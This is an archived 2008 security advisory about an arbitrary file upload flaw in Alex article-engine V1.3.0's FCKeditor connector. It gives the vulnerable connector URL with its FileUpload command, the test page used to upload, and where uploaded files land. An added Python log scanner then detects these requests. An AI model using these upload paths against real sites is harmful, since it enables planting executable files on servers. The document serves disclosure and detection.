alexarticle-upload.txt

19 Nov 2008 00:00:00 | Reported by Batter | Type: packetstorm | Source: packetstormsecurity.com

Alex article-engine V1.3.0 contains an arbitrary file upload vulnerability, discovered by Batter, that allows unauthorized file uploads through the FCKeditor connector. Solution: restrict access to the resources and grant it only to trusted users.

Code
```
########################################################################
#
# Yellow Flood Organization
#
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/article-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
#
# Discovered by: Batter
#
########################################################################

####################
- Vulnerability:
####################

/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?

Command=FileUpload&Type=File&CurrentFolder=/

####################
- Exploit:
####################

http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html

####################
- How to use:
####################

http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*

####################
- Solution:
####################

Restrict and grant only trusted users access to the resources.

####################
- Greets :
####################

THE.HACKER.ONE , Str0ke

####################
```
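A defensive check built from the paths in the advisory, added here as an example (it is not part of the original advisory or of the vendor's code): it scans web access logs for `FileUpload` commands sent to the FCKeditor connector, hits on the connector test page, and requests for server-executable file types under `images/site_images/`. The Apache combined log format, the extension list and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Connector and upload directories named in the advisory.
CONNECTOR_RE = re.compile(r"/fckeditor/editor/filemanager/.*/connectors/", re.I)
UPLOAD_DIR_RE = re.compile(r"/images/site_images/", re.I)
# Assumption: extensions this server would execute; match the handler config.
# The trailing (\.|$) also catches double extensions such as "x.php.jpg".
EXEC_EXT_RE = re.compile(r"\.(php\d?|phtml|phar|pl|cgi|asp|aspx|jsp)(\.|$)", re.I)

def classify(line):
    """Return (client, status, reason) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(3), int(m.group(4))
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = {k.lower(): v[0].lower() for k, v in parse_qs(parts.query).items()}
    if CONNECTOR_RE.search(path):
        if query.get("command") == "fileupload":
            return (client, status, "connector FileUpload")
        if path.lower().endswith("/test.html"):
            return (client, status, "connector test page")
    if UPLOAD_DIR_RE.search(path) and EXEC_EXT_RE.search(path):
        return (client, status, "executable extension in upload dir")
    return None

def scan(lines):
    """Classify every line and keep only the suspicious ones, in order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [19/Nov/2008:10:01:02 +0000] "GET /admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html HTTP/1.1" 200 2210',
    '203.0.113.7 - - [19/Nov/2008:10:01:40 +0000] "POST /editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 310',
    '203.0.113.7 - - [19/Nov/2008:10:02:05 +0000] "GET /images/site_images/notes.php HTTP/1.1" 200 54',
    '198.51.100.4 - - [19/Nov/2008:10:03:00 +0000] "GET /images/site_images/logo.png HTTP/1.1" 200 8812',
]

if __name__ == "__main__":
    for client, status, reason in scan(SAMPLE):
        print(f"{client} status={status} {reason}")
```

A 200 response on any of the three findings means the connector or an uploaded file is reachable without the access restriction the advisory recommends.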
